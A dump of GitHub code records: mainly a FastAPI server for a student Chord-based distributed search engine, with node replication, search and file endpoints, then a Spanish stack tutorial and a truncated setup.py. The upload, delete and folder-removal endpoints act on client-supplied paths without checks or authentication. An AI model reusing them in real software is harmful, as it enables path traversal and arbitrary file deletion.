{len(new_data_combined)}\")\n replay_list = list(node.replay.values())[0]\n print(f\"replay_list = {replay_list}, len = {len(replay_list)}\")\n new_data_combined.extend(replay_list)\n print(f\"new_data_combined = {new_data_combined}, len = {len(new_data_combined)}\")\n node.update_server_files(new_data_combined, [])\n elif len(node.get_members()) == 2:\n print(\"HAY 2 NODOS EN LA RED\")\n #Copiar lo del uno en el otro\n # poner elif\n if str(next_id) != str(current_id) or next_address != None:\n if next_fallen:\n print(f\"node.get_members() = {node.get_members()}\")\n print(\"PRIMETA PARTE next_fallen = True\")\n # Llamo a mi sucesor y este tiene que agregar en su node.data los archivos de su node.replay\n # Luego, llama a su sucesor pasandole su nuevo node.data para q lo actualice en su otro node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_succ_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_succ_data'\n\n print(f\"url = {url}\")\n try:\n response_data_node_succ = requests.get(url, verify=False)\n print('Elementos replicados exitosamente en 1ra parte')\n except:\n print('Error al replicar elementos en 1ra parte')\n\n print(\"SEGUNDA PARTE next_fallen = True\")\n # LLAmo a mi sucesor y le paso mis docs de node.data para q los actualice en su node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_all_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_all_data'\n\n print(f\"(((((((((((((( url = {url}\")\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data[0] = {current_data}\")\n doc = \"\".join(current_data)\n\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n print(\"-------------- url de replication files 2 ---------------- \", url)\n try:\n response = requests.get(url, verify=False) #AQUI HUBO ERROR, múltiples intentos de conexión y todos ellos fallaron. \n print(\"/////////////////////////, \", response)\n print('Elementos replicados exitosamente en 2da parte')\n except:\n print('Error al replicar elementos en 2da parte')\n else:\n print(f\"node.get_members() = {node.get_members()}\")\n print(\"PRIMETA PARTE next_fallen = False\")\n # Tengo q tomar mis node.data y node.replay y unirlo y llamar a mi sucesor para q lo actualice en \n # su node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_all_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_all_data'\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_data = list(separated_data[0].values())[0]\n current_replay = list(separated_data[1].values())[0]\n new_current_data = current_data + current_replay\n print(f\"new_current_data = {new_current_data}\")\n node.update_server_files(new_current_data, current_replay)\n\n doc = \"\".join(new_current_data)\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False) #AQUI HUBO ERROR, múltiples intentos de conexión y todos ellos fallaron. \n print(\"////////////////////, \", response)\n print('Elementos replicados exitosamente en 2da parte del next_fallen = False')\n except:\n print('Error al replicar elementos en 2da parte next_fallen = False')\n\n print(\"SEGUNDA PARTE next_fallen = FAlse\")\n # 3- Actualizar el node.replay del current node, seran los docs de prev node\n print(\"----------------------------------PASO 3\")\n prev_adr = node.chan.get_member(node.get_predecessor())\n print_success(f\"!!!!!!!!!!!!!!!!!!!prev en next_fallen = FAlse => {prev_adr}\")\n try:\n print(\"1-\")\n url = f'http://{prev_adr[\"ip\"]}:{prev_adr[\"port\"]}/api/get_actual_data'\n except:\n print(\"2-\")\n url = f'http://{prev_adr.ip}:{prev_adr.port}/api/get_actual_data'\n print(f\"url = {url}\")\n # obtener los doc del node preview\n try:\n response_data_prev = requests.get(url, verify=False) \n data_prev = response_data_prev.json()\n print(f\"data_prev = {data_prev}, len = {len(data_prev)}\")\n data_prev_list = list(data_prev[0].values())[0]\n print(f\"data_prev_list = {data_prev_list}, len = {len(data_prev_list)}\")\n node.update_server_files(current_data, data_prev_list)\n add_to_database(database,\"\",data_prev_list, True)\n print('Elementos replicados exitosamente en next_fallen = FAlse')\n except:\n print('Error al replicar elementos en next_fallen = FAlse')\n\n \n print(\"COMPROBANDO TODO 2 ....\")\n all_data = get_all_data()\n print_success(f\"all_data 2 = {all_data}, len = {len(all_data)}\")\n print_success(\"!!!! TERMINO EL replication_files 2!!!!\")\n \n\n@app.get('/api/update_all_data/{doc}')\ndef update_all_data (doc:str):\n print(\"ENTRO AL update_all_data\")\n # node.data = node.data.extend(node.replay) # extend no existe\n print(\"node data *************\", node.data)\n print()\n print(\"node replay *************\", node.replay)\n print()\n #node.data.update(node.replay)\n print(\"node data *************\", node.data)\n print()\n update_replay_data(doc)\n \n\n# Actualiza en el sucesor de mi sucesor el data.replay\n@app.get('/api/update_succ_data')\ndef api_update_succ_data():\n print(\"ENTRO A api_update_succ_data\")\n succ_adr = node.chan.get_member(node.get_succesor())\n new_data = []\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data = {current_data}, len = {len(current_data)}\")\n print()\n\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_replay = list(separated_data[1].values())[0]\n print(f\"current_replay = {current_replay}, len = {len(current_replay)}\")\n\n new_data = current_data + current_replay\n print(f\"new_data combinada = {new_data}, len = {len(new_data)}\")\n node.update_server_files(new_data, current_replay) #DATOS MIOS Y DE MI PREVIEWS Q SE CAYO\n\n # LLamar a mi sucesor para que actualice su node.replay, pq mi node.data cambio\n try:\n print(\"1-\")\n url = f'http://{succ_adr[\"ip\"]}:{succ_adr[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{succ_adr.ip}:{succ_adr.port}/api/update_replay_data'\n\n print(f\"utl = {url}\")\n doc = \"\".join(new_data)\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n print(\"SALIO DEL api_update_succ_data\")\n\n@app.get('/api/update_replay_data/{doc}')\ndef api_update_replay_data(doc:str):\n print(f\"--------------ENTRO EN /api/update_replay_data\")\n return update_replay_data(doc)\n\ndef update_replay_data(doc:str):\n print(f\"--------------ENTRO EN update_replay_data\")\n print(f\"doc = {doc}\")\n #indices = get_indexes_from_str(doc)\n #print(f\"indices = {indices}\")\n #new_replay = []\n #for i in indices:\n # temp = f\"document_{i}.txt\"\n # new_replay.append(temp)\n matches = re.findall(r\"document_(\\d+)\\.txt\", doc)\n new_replay = [f\"document_{int(match)}.txt\" for match in matches]\n print(f\"new_replay = {new_replay}\")\n \n print(f\"node.data antes de hacer sorted = {node.data}\")\n print()\n print(f\"node.replay antes de hacer sorted = {node.replay}\")\n current_data = list(node.data.values())[0]\n #old_replay = list(node.replay.values())[0]\n node.update_server_files(current_data, new_replay)\n # AGREGAR A LA BD los archivos de la nueva replica!\n add_to_database(database,\"\", new_replay, True)\n\n # Borrar los archivos viejos\n #print(\"VAMOS A BORRAR LOS DOCUMENTOS DEL OLD REPLAY\")\n #old_indexes = get_indexes_from_list(old_replay)\n #print(f\"old_indexes = {old_indexes}\")\n #for i in old_indexes:\n # database.remove_file(i)\n new_all_data = get_all_data()\n print(f\"DOCUMENTOS DE LA BASE DE DATOS = {new_all_data}, len = {len(new_all_data)}\")\n print(f\"node.data = {node.data}, node.replay = {node.replay}\")\n\n print_info(\"After update_replay_data restarting pred_data_info\")\n if not len(node.replay.items()) <= 0:\n print_info(\"Inside if...\")\n items = [(id, address) for (id,address) in node.replay.items()]\n node.restart_pred_data_info(int(items[0][0]))\n print_info(f\"node.pred_data: {node.pred_data}\")\n print_info(f\"node.pred_data_copied: {node.pred_data_copied}\")\n# def get_prev_adr(prev_id):\n# print(\"-----------ENTRO A get_prev_adr\")\n# print(f\"prev_id = {prev_id}\")\n# miembros = node.get_members()\n# print(f\"miembros = {miembros}\")\n# for n in node.chan.osmembers.items():\n# print(f\"node in osmembers is {n}\")\n# print(f\"n[0] == str(prev_id) = {n[0] == str(prev_id)}\")\n# if n[0] == str(prev_id):\n# result = n[1]\n# print(f\"result = {result}\")\n# return result\n# print(f\"result = {result}\")\n# return result\n\n# @app.get('/api/replication_docs/{doc}')\n# def replication_docs(doc: str):\n# print(f\"--------------ENTRO EN api/replication_docs\")\n# indices = get_indexes(doc)\n# for data in indices:\n# database.insert_file(data)\n# actual_docs = get_all_data()\n# print(f\"actual_docs = {actual_docs}\")\n# node.update_server_files(actual_docs)\n# return True\n\n# @app.delete('/api/delete_prev_doc/{doc}')\n# def delete_prev_doc(doc:str):\n# print(f\"--------------ENTRO EN api/delete_prev_doc\")\n# indices = get_indexes(doc)\n# for i in indices:\n# database.remove_file(i)\n \n# actual_docs = get_all_data()\n# node.update_server_files(actual_docs)\n# print(f\"Documentos eliminados: {indices}\")\n# print(f\"Documentos restantes en la base de datos: {actual_docs}\")\n\n# return {'deleted_docs': indices, 'remaining_docs': list(actual_docs)}\n \ndef get_indexes_from_str(doc:str):\n pattern = r\"document_(\\d+)\\.txt\" \n matches = re.finditer(pattern, doc)\n indices = [int(match.group(1)) for match in matches]\n return indices\n\ndef get_indexes_from_list(doc):\n print(\"ENTRO EN get_indexes_from_list\")\n print(f\"doc = {doc}\")\n print(f\"type(doc) = {type(doc)}\")\n indexes = []\n for d in doc:\n match = re.search(r'\\d+', d)\n if match:\n index = int(match.group())\n indexes.append(index)\n else:\n print(f'No se encontró el indice {d}')\n return indexes\n\n# @app.get('/api/replication/{rango}') # ROXANA\n# def api_replication(rango:str):\n# print(f\"-------------ENTRO EN API REPLICATION\")\n# print(f\"RANGO = {rango}\")\n# new_docs_replicated = []\n# pos = rango.find('_')\n# print(\"pos = \", pos)\n# prev_id = int(rango[:pos])\n# print(\"prev_id = \", prev_id)\n# newserver_id = int(rango[pos + 1:])\n# print(\"newserver_id = \", newserver_id)\n \n# for i in range(prev_id,newserver_id):\n# new_docs_replicated.append(f\"document_{i}.txt\")\n\n# print(f\"new_docs_replicated = {new_docs_replicated}, len = {len(new_docs_replicated)}\")\n# text_list = convert_str_to_text_class(PATH_TXTS,new_docs_replicated)\n\n# for file in text_list:\n# database.insert_file(file)\n \n# check_files = f\"SELECT ID FROM File\"\n# result = database.execute_read_query(check_files)\n# docs_to_add = []\n# for i in result:\n# doc = f\"document_{i[0]}.txt\"\n# docs_to_add.append(doc)\n \n# print(check_files)\n# print(f\"documentos actuales en API REPLICATION = {docs_to_add}, len = {len(docs_to_add)}\")\n# node.update_server_files(docs_to_add)\n\n@app.get('/api/get_actual_data') # ROXANA\ndef api_get_actual_data():\n print(\"----------ENTRO EN api_get_actual_data\")\n return get_separated_data()\n\ndef get_all_data():\n print(f\"-------------ENTRO EN get_all_data\")\n check_files = f\"SELECT ID FROM File\"\n print(check_files)\n result = database.execute_read_query(check_files)\n docs_to_add = []\n for i in result:\n doc = f\"document_{i[0]}.txt\"\n docs_to_add.append(doc)\n \n return docs_to_add\n\ndef get_separated_data():\n print(\"----------ENTRO EN get_separated_data\")\n return [node.data, node.replay]\n\nclass File(BaseModel):\n file_name: str\n server_number: int\n content: str\n # paginas:int\n # editorial: Optional[str]\n\nclass Message(BaseModel):\n server_ip: str\n server_port: int\n content: str\n\nclass AddressModel(BaseModel):\n node_id:int\n ip:str\n port:int\n\nclass FilesModel(BaseModel):\n node_id:int\n ip:str\n port:int\n files:List[str] = []\n\n\n@app.on_event(\"startup\") #ROXANA\nasync def startup_event():\n print(f\"La aplicación se está ejecutando...\")\n\n@app.get(\"/\")\ndef index():\n \n my_variable = os.environ.get('CLUSTERS')\n\n if my_variable is not None:\n print(f\"El valor de la variable de entorno MY_VARIABLE es {my_variable}\")\n else:\n print(\"La variable de entorno MY_VARIABLE no está definida.\")\n return {\n \"data\":[\n {\"name\": \"Hello World!\", \"url\":\"https://localhost:3000\"}\n ]\n }\n\n# Cliente\n# @app.get('/files/{id}')\n# def show_file(id: int):\n# return search_file(id)#{\"data\": id}\n\n# Cliente\n@app.get('/files/search/{text}') #ROXANA\ndef show_file(text: str):\n print(\"-------------ENTRO EN SHOW FILE\")\n print_debug(f\"Searching Text... {text}\")\n #buscar en el propio server primero\n response_me = decorate_data(find_in_myself(text))\n print(f\"response_me = {response_me}\")\n response_others = search_by_text(text)#{\"data\": id} #DUDA ESPERAR A RESPUESTA DE CARLOS EN EL GRUPO\n print(f\"response_others = {response_others}\")\n response = unique(response_me, response_others)\n #response_me.extend(response_others)\n print(f\"response_me unido con response_others = {response}\")\n return response\n\ndef unique(response_me, response_others):\n print(\"--------------ENTRO EN UNIQUE\")\n result = copy.copy(response_me)\n\n for elem in response_others:\n print(f\"elem = {elem}\")\n print(f\"elem not in result = {elem not in result}\")\n if elem not in result:\n result.append(elem)\n\n print(f\" result = {result}\")\n return result\n\ndef find_in_myself(text):\n print(\"----------------------ENTRO A find_in_myself\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().name))\n matched_documents = match_by_name(text)\n print_success(f\"!!!! find_in_myself !!! matched documents = { matched_documents}\")\n matched_rank = tf_idf(text)\n print_success(f\"!!!! find_in_myself !!! matched rank = {matched_rank}\")\n\n for i in matched_rank:\n if i not in matched_documents:\n matched_documents.append(i)\n\n # matched_documents = matched_documents + matched_rank\n\n # if matched_documents == []:\n # #Calcularel tf_idf #{\"data\": id}\n # return [matched_rank,False] #El booleano: PARA SABER SI LO QUE DEVUELVE EL METODO ES QUE MATCHEO CON NOMBRE O CON EL RANKING\n # else:\n # return [matched_documents, True]\n\n print(\"!!!----find_in_myself---!!!! final matched documents \", matched_documents)\n\n #result = decorate_data(matched_documents)\n return matched_documents #[matched_documents, True]\n #return result\n \n# Server\n# Este es el que llama al TF-IDF\n@app.get('/api/files/search/{text}') \ndef search_file_in_db(text: str): #ROXANA\n print(\"----------------------ENTRO A SEARCH FILE IN DB\")\n return find_in_myself(text)\n\n\n@app.post(\"/files\")\ndef add_file(file: File):\n return {\"msg\": f\"File {file.file_name} a\"}\n\n# Chord\n# Chord Variables\nfrom chord.chord import *\nfrom chord.channel import *\n\nchannel: Channel = None\nnode = ChordNode(channel, Address(first_server_address_ip, \n first_server_address_port), \n Address(server, port),\n default_leader_port = DEFAULT_LEADER_PORT,\n LOCAL=local,\n hash_type=hash_type)\nchannel = node.chan\n# Chord endpoints\n@app.post('/chord/receive/{text}')\ndef receive_notification(text: str):\n print(text)\n\n # Finger Table Routine\n # Create Thread for this process\n # Or create an endpoint\n # while True: #-\n\n # TODO: change this line for request from fastapi endpoint\n # Done! message = node.chan.recvFromAny() # Wait for any request #-\n # TODO: change this line for request from fastapi endpoint\n\n # sender = message[0] # Identify the sender #-\n # request = message[1] # And the actual request #-\n # if request[0] != LEAVE: #and self.chan.channel.sismember('node',str(sender)): #-\n # node.addNode(sender) #-\n # if request[0] == STOP: #-\n # break #-\n # if request[0] == LOOKUP_REQ: # A lookup request #-\n # nextID = node.localSuccNode(request[1]) # look up next node #-\n # server = node.chan.sendTo([sender], (LOOKUP_REP, nextID)) # return to sender #-\n # # node.make_request(server)\n # data = {\"server\":server, \"msg\":(LOOKUP_REP, nextID)}\n # requests.post(f\"http://{server.address.ip}:{server.address.port}/\")\n # if not nextID in node.get_members():#node.chan.exists(nextID): #-\n # node.delNode(nextID) #-\n # elif request[0] == JOIN: #-\n # continue #-\n # elif request[0] == LEAVE: #-\n # node.delNode(sender) #-\n # node.recomputeFingerTable() #-\n # print('FT[','%04d'%node.nodeID,']: ',['%04d' % k for k in node.FT]) #- \n\n return text#{\"data\": id}\n\n@app.post(\"/chord/send\")\ndef send_notification_app(message: Message):\n return {\"server\":f\"Server: {message.server}\",\"msg\": f\"msg: {message.content}\"}\n\n# Chord Channel Endpoints\ndef parse_server(message:Message):\n temp = dict(message.server)\n print(temp)\n return temp\n\n@app.post(\"/chord/channel/join\")\ndef send_message(message: Message):\n print(message.server_ip, message.server_port, message.content)\n # parse_server(message)\n nodeID = None\n if node.is_leader:\n nodeID = int(node.chan.join('node', message.server_ip, message.server_port, order=False)) # Find out who you are #-\n node.addNode(nodeID)\n print_debug(\"Inside Join Endpoint: \" + str(nodeID))\n print_info(node.nodeID)\n # node.recomputeFingerTable()\n # return {\"server\":f\"Server: {message.server}\",\"msg\": f\"msg: {message.content}\"}\n return nodeID\n\n@app.get('/chord/channel/info')\ndef get_channel_members():\n return {\"osmembers\":node.chan.osmembers, \"nBits\":node.chan.nBits, \"MAXPROC\":node.chan.MAXPROC, \"address\":node.chan.address }#search_by_text(text)#{\"data\": id}\n\n@app.get('/chord/channel/members')\ndef get_channel_members():\n return {\"osmembers\":node.chan.osmembers, \"nBits\":node.chan.nBits, \"MAXPROC\":node.chan.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Chord Replication Endpoints\n# Si el predecesor envia un mensaje para replicarse, el sucesor guarda la informacion del mismo\n@app.get('/chord/succ/{text}')\ndef get_channel(text: str):\n return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Confirmar que ya se replico la informacion en el siguiente nodo\n@app.post('/chord/succ/data/done')\ndef post_data(files: FilesModel):\n print(\"Replication Done!\", files.files)\n return node.confirm_pred_data_info(files.node_id, Address(files.ip, files.port), files.files)#node.check_pred_data(address.node_id, Address(address.ip, address.port))#return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Verificar si ya se replico la informacion en el siguiente nodo\n@app.post('/chord/succ/data')\ndef verify_data(address: AddressModel):\n get_all_data()\n return node.check_pred_data(address.node_id, Address(address.ip, address.port))#return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n@app.delete('/api/remove_doc/{rango}') # ROXANA\ndef remove_doc_api(rango:str):\n print(\"--------------------ENTRO A REMOVE DOC API\")\n pos = rango.find('_')\n print(\"pos = \", pos)\n prev_id = int(rango[:pos])\n print(\"prev_id = \", prev_id)\n newserver_id = int(rango[pos + 1:])\n print(\"newserver_id = \", newserver_id)\n remove_data = []\n for i in range(prev_id, newserver_id):\n print(\"remove doc = \", i)\n data = f\"document_{i}.txt\"\n remove_data.append(data)\n database.remove_file(i)\n \n new_data_list = []\n print(f\"node.data = {node.data}\")\n current_data = list(node.data.values())[0]\n print(f\"node.nodeID = {node.nodeID}\")\n\n print(f\"current_data en el remove_doc_api = {current_data}\")\n for d in current_data:\n if d not in remove_data:\n new_data_list.append(d)\n\n # ahora vm solamente con los doc que se quedan en el server \n text_list_to_remove = convert_str_to_text_class(PATH_TXTS, remove_data)\n # for text in text_list_to_remove:\n # vec_mod.delete_doc(text.id)\n # vec_mod.doc_terms.clear()\n # vec_mod.doc_terms_data(text_list) \n vec_mod.delete_doc_list(text_list_to_remove) \n \n print(f\"new_data_list = {new_data_list}\")\n print(f\"node.replay = {node.replay}\")\n replay_list = list(node.replay.values())[0]\n node.update_server_files(new_data_list, replay_list)\n\n #ACTUALIZAR el data.replay de mi succ pq mis archivos cambiaron\n print(f\"------------------------Desde el remove_doc_api voy a replicarme en mi sucesor\")\n next_address = node.chan.get_member(node.get_succesor())\n print(f\"next_address = {next_address}\")\n if next_address != None:\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_replay_data'\n doc = \"\".join(current_data)\n\n print(f\"url = {url}\")\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n\n# Leader\n@app.get('/chord/channel/leader')\ndef is_leader():\n return {\"is_leader\":node.is_leader, \"node_id\":node.nodeID}\n\n@app.get('/chord/channel/get_leader')\ndef get_leader():\n leader_ip = None\n leader_port = None\n actual_leader = node.leader\n if actual_leader:\n leader_ip = actual_leader.ip\n leader_port = actual_leader.port\n # else:\n # leader_ip = node.node_address.ip\n # leader_port = node.node_address.port\n\n return {\"is_leader\":node.is_leader, \"node_id\":node.nodeID, \"node_address_ip\":node.node_address.ip, \"node_address_port\":node.node_address.port, \"leader_ip\":leader_ip, \"leader_port\":leader_port}\n\n\ndef chord_replication_routine():\n print(\"Started Node Replication Routine\")\n print(\"Timeout: \", TIMEOUT)\n stopped = False\n discover_timeout = 3\n try:\n while not stopped:\n # Actualizar la lista de nodos con el lider\n node.update_succesors()\n # Obtener el sucesor\n next_id, next_address = node.get_succesor(), node.chan.get_member(node.get_succesor())#node.localSuccNode(node.nodeID)\n print(\"Successor\", next_id, next_address)\n # Buscar si el siguiente nodo sigue activo\n # Verificar si ya se replico la informacion al sucesor\n # Al hacer la peticion verifico si sigue activo y ademas si ya se replico la info\n data = {}\n r = None\n if (not next_id == None ) and (not next_address == None):\n next_address = Address.extract_ip_port(next_address)\n data = {\"node_id\":node.nodeID, \"ip\":node.node_address.ip,\"port\": int(node.node_address.port)}\n try:\n r = requests.post(f\"http://{next_address.ip}:{next_address.port}/chord/succ/data\", json=data, timeout=TIMEOUT)\n except Exception as e:\n print(\"Error trying to verify data replication\")\n print(e)\n print(f\"--------R: {r}\")\n # Si no se ha replicado la informacion. Copiala\n if r:\n print(\"----ENTRO EN EL 1er IF\")\n # print(\"Inside Verifying Data Replication\")\n text = bool(r.json())\n # print(text)\n # print(r.text)\n # print(r.content)\n # print(r.json())\n if not text:\n # Si no se ha replicado, replicalo!\n node.make_replication(next_id, next_address)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 1\")\n replication_files1(next_id, next_address)\n # Si el siguiente se cayo, vuelvela a copiar, busca primero el nodo\n else:\n print(\"-----ENTRO EN EL 2DO IF\")\n node.update_succesors()\n node.succ = node.get_succesor()\n if node.succ:\n node.make_replication(next_id, next_address)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 2\")\n replication_files2(next_id, next_address,True)\n # Busca si el de atras ya existe:\n if node.predecessor:\n print(\"-----ENTRO EN EL 3ER IF\")\n r = None\n # Busca si se cae el de atras\n try:\n r = requests.get(f\"http://{node.predecessor[1].ip}:{node.predecessor[1].port}/\")\n except Exception as e:\n print(e)\n # Si se cae el de atras\n if not r or not r.ok:\n # Agrega al conjunto del actual el contenido que tenias del de atras que estaba replicado en ti\n content = node.merge()\n # Este nuevo contenido pasaselo a tu sucesor si es q no ha cambiado, si cambio, pasale el nuevo contenido mas\n # el tuyo\n node.make_replication(next_id, next_address, content)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 3\")\n # NO HACE FALTA ANALIZAR EL CASO DE QUE SE CAYO MI ANTECESOR PQ YA SE INCLUYE CUANDO SE ANALIZA EL CASO CAUNDO SE CAE MI SUCESOR\n replication_files2(next_id, next_address, False)\n # TODO: FixBug TypeError: 'NoneType' object does not support item assignment\n print_debug(\"Predecessors\" + str(node.predecessor))\n node.restart_pred_data_info(node.predecessor[0])\n # else:\n # Si aun no se tiene predecesor, esperamos a que el venga a buscarnos\n\n # TODO: Agregar rutina de FixFinger para que se ejecute a cada rato\n # node.recomputeFingerTable() #-\n print(\"FT\", node.FT)\n # print('FT[','%04d'%node.nodeID,']: ',['%04d' % k for k in node.FT]) #- \n\n print_info(node)\n print_info(\"get_predecessor method: \"+str(node.get_predecessor()))\n # Si es lider entonces:\n # Check for other leaders or nodes on the network\n # Discovering\n if not discover_timeout and node.is_leader:\n node.discover()\n print_log(f\"Leaders List: {node.leaders_list}\")\n # Update discover_timeout: Iteraciones requeridas para verificar quienes estan en la red,\n # asi como los que se hayan unido nuevos. Se utiliza para estar atentos a cuando:\n # se unan o desconecten redes.\n if discover_timeout <= 0:\n discover_timeout = 3\n\n discover_timeout -= 1\n print_log(f\"Discover Timeout: {discover_timeout}\")\n # Reccess\n print(f\"On Thread...Sleeping for {TIMEOUT} seconds\")\n time.sleep(TIMEOUT)\n except KeyboardInterrupt as e:\n print(\"Stopping Chord Routine Thread...\")\n stopped = True\n\ndef check_alive():\n stopped = False\n try:\n while not stopped:\n if node.is_leader and datetime.datetime.now().time().second/30 == 0:\n # print(node.clock)\n # print(\"-------------------------------Check alive-----------------------------\")\n node.check_live_nodes()\n # time.sleep(10)\n except KeyboardInterrupt as e:\n stopped = True\n\n\n# Uploading Files\nfrom fastapi import APIRouter, UploadFile, File, Form\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom os import getcwd, remove\nfrom shutil import rmtree\n\nrouter = APIRouter()\n\n\n@router.post(\"/upload\")\nasync def upload_file(file: UploadFile = File(...)):\n with open(getcwd() + \"/txts/\" + file.filename, \"wb\") as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n return \"success\"\n\n\n@router.get(\"/file/{name_file}\")\ndef get_file(name_file: str):\n return FileResponse(getcwd() + \"/downloads\" + name_file)\n\n# Cliente\n# Metodo para que el cliente le pida un archivo a traves de una url al servidor con el que se esta comunicando\n@router.get(\"/download/{number}\")\ndef download_file(number: str):\n print(\"ENTRO EN DOWNLOAD FILE\")\n print(\"number \", number)\n file_name = \"document_\" +number +\".txt\"\n response = find_download(number) # VA A BUSCAR SI EL CURRENT SERVER TIENE EL ARCHIVO\n print(\"type(response) = \",type(response))\n print(\"type(response) == bool \", type(response) == bool)\n if type(response) == bool: #SI NO SE ENCONTRO EL ARCHIVO\n response = search_to_download(number) # SE LO PIDE A LOS DEMAS SERVERS\n if response is None:\n response = {\"error\": f\"File '{file_name}' not found in the database.\"}\n \n print(\"response in download_file \", response)\n \n file_response = FileResponse(response[0], media_type=\"application/octet-stream\", filename=response[1])\n print(\"type(file_response) \", type(file_response))\n return file_response \n\ndef find_download(number:str):\n print(\"ENTRO EN FIND DOWNLOAD\")\n print(\"number \", number)\n file_name = \"document_\" +number +\".txt\"\n file_path = Path(os.path.join(PATH_TXTS,file_name))\n\n print(\"file_path \", file_path)\n if not file_path.exists(): #Comprueba si el archivo existe en la carpeta txts\n return {\"error\": f\"File '{file_name}' not found in the folder.\"}\n \n #Comprobar si el archivo esta en la base de datos del servidor\n result_ID = check_database(number)\n print(\"len(result_ID)=\",len(result_ID))\n if len(result_ID) > 0:\n response = [file_path,file_name]\n else:\n response = False\n print(\"response en FIND DOWNLOAD \", response)\n return response\n\n\n# Server\n@router.get(\"/api/download/{number}\")\ndef download_file_api(number: str):\n print(\"ENTRO EN API DOWNLOAD\")\n return find_download(number)\n \n #return FileResponse(getcwd() + \"/downloads\" + \"/\"+filename, media_type=\"application/octet-stream\", filename=filename)\n\n@router.delete(\"/delete/{name_file}\")\ndef delete_file(name_file: str):\n try:\n remove(getcwd() + \"/\" + name_file)\n return JSONResponse(content={\n \"removed\": True\n }, status_code=200)\n except FileNotFoundError:\n return JSONResponse(content={\n \"removed\": False,\n \"message\": \"File not found\"\n }, status_code=404)\n\n\n@router.delete(\"/folder\")\ndef delete_file(folder_name: str = Form(...)):\n rmtree(getcwd() + folder_name)\n return JSONResponse(content={\n \"removed\": True\n }, status_code=200)\n\napp.include_router(router)\nprint(\"EMPEZAMOS\")\ninit_servers(database, name_db)\n#redistribute_data(database)","repo_name":"Krtucho/distributed_search_engine","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":57544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27662476777","text":"'''\nUna pila (stack en inglés) es una lista ordenada o estructura de datos\nque permite almacenar y recuperar datos, siendo el modo de acceso a sus\nelementos de tipo LIFO (del inglés Last In, First Out, \n«último en entrar, primero en salir»)\n\nLas operaciones de una pila son insertar y quitar.\nInsertar (push) añade un elemento a la pila.\nQuitar (pop) elimina o saca un elementos de la pila.\nVeamos un ejemplo de LIFO: último en entrar, primero en salir\n'''\npila=[]\npila.append(\"T\")\npila.append(\"E\")\npila.append(\"C\")\npila.insert(len(pila),\"A\") #<==ESta instruccion seria el equivalente al PUSH\nprint(pila)\n\nc = pila.pop()\nprint(c)\nc = pila.pop()\nprint(c)\nc = pila.pop()\nprint(c)","repo_name":"fedemtzesc/curso-python","sub_path":"curso/pilas.py","file_name":"pilas.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11772748998","text":"\"\"\"A setuptools based setup module.\"\"\"\nfrom os import path\nfrom setuptools import setup, find_packages\nfrom io import open\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='fantasy-analytics',\n version='0.0.1',\n description='ESPN Fantasy Basketball Analytics Platform',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/themarathoncontinues/fantasy-analytics',\n author='Mitchell Bregman, Leon Kozlowski',\n author_email='mitchbregs@gmail.com, leonkozlowski@gmail.com',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'Programming Language :: Python :: 3.6'\n ],\n keywords='Fantasy Basketball Analytics',\n packages=find_packages(),\n install_requires=[\n 'celery',\n 'flask',\n 'mock',\n 'prefect',\n 'prefect[postgres]',\n 'prefect[viz]',\n 'pytest',\n 'pytest-cov',\n 'python-dotenv',\n 'requests',\n 